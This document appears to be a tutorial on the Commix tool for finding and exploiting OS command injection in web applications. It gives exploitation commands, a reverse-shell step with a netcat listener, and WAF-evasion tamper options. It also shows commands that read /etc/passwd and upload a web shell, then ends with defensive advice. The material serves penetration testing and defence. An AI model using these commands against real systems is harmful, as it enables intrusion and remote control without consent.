Commix (short for Command Injection eXploiter) is one of the most powerful open-source tools specifically built to automate detection and exploitation of OS command injection vulnerabilities.
Unlike general-purpose scanners (Burp, ZAP, sqlmap), Commix focuses only on command injection, finding places where user input is unsafely passed to system commands (exec, passthru, system, shell_exec, popen, proc_open, etc.).
Current status: still actively maintained on GitHub, works very well against modern PHP, Python, Node.js, Ruby, Perl, and Java backends.
Installing Commix (Kali or other Linux; Termux)
# 1. Git cloning is the recommended method
git clone https://github.com/commixproject/commix.git
cd commix
pip3 install --user -r requirements.txt
python3 commix.py --help
# 2. If installed through Kali Rolling or BlackArch (already done)
sudo apt update && sudo apt install commix
Core Modes of Use and Example Implementations
1. Primary form of detection and exploitation (most common use-case scenario)
Target: A web application that is exploitable due to a command injection flaw in one of its parameters
python3 commix.py -u "http://target.com/ping.php?ip=127.0.0.1"
Commix will:
1. Attempt multiple ways to inject by testing for (historical) command injections as well as through blind, time-based command injection, etc.
2. Attempt to use different types of separator characters: ;, &, |, &&, ||, %0a, $( ), etc.
3. Attempt to fingerprint the target operating system and web server
4. If the target is found to be injectable, Commix will create and drop a pseudo-terminal shell on the target.
2. POST request injection (very common in real apps)
python3 commix.py \
--url="http://target.com/submit.php" \
--data="name=test&email=test@example.com&cmd=ping" \
--level=3
3. Target specific parameter & speed up
python3 commix.py \
-u "http://target.com/vuln.php?host=*" \
-p host \
--os-cmd="whoami" \
--level=2 --risk=3
4. Use custom cookie / headers (authenticated endpoints)
python3 commix.py \
-u "http://target.com/admin/execute.php?cmd=*" \
--cookie="PHPSESSID=abc123; admin=1" \
--headers="X-Forwarded-For: 127.0.0.1"
5. Get reverse shell (classic goal)
After successful detection:
commix(os)> shell
# or directly
commix(os)> reverse_tcp 192.168.1.10 4444
Then catch it with:
nc -lvnp 4444
6. File read / write / upload (very useful)
commix(os)> file_read /etc/passwd
commix(os)> file_write /tmp/backdoor.php
commix(os)> file_upload shell.php /var/www/html/
7. Advanced: tamper with scripts & evasion
commix utilizes built in tamper modules(like sqlmap) to bypass a firewall
python3 commix.py -u "http://target.com/vuln" --tamper=base64encode,space2comment
Most popular tampering methods:
1. space2comment
2. base64encode
3. charencode
4. randomcase
5. versionedkeywords
Common Vulnerable Patterns Found in Real World Bug Bounty and Pentest
1. Custom PHP ping or traceroute tools are a common way to introduce vulnerabilities.
2. Forgotten debug endpoints, such as "/ping.php?ip" and "/exec.php?cmd".
3. Log viewers that are using tail -f or grep on user-controlled input.
4. The use of unsanitized paths as parameters to executable commands in backup or restore. For example, using tar, zip, or unzip with a user-controlled input.
5. Unsafe calls to child_process.exec() in Node.js and subprocess.call() in Python.
Developers and Owners Quick Protection List
1. Never send unvalidated user input to any system commands.
2. Make use of appropriate APIs (for example, subprocess.run(..., shell=False), PHP escapeshellarg(), Node execFile).
3. Validate and whitelist the characters allowed (example - only a-z0-9.- for IP/hostname).
4. Minimum privilege web application user (do not run as ‘root’) must be used.
5. Use a WAF configured with command injection detection signatures (for example, Cloudflare’s free WAF; ModSecurity).
6. Frequently run scanning tools using commix, sqlmap, or from nuclear via template to find OS Command Injection vulnerabilities.
The main benefit of using commix to test OS Command injection is that it is quicker (it is focused on finding only this type of vulnerability). It is also more effective than sqlmap when testing authenticated endpoints, blind or time-based OS Command injections, and for file read/write/reverse shells for post exploitation.
Commix should only be used for ethical hacking on systems that the user owns or when explicit written consent has been given to test the target.
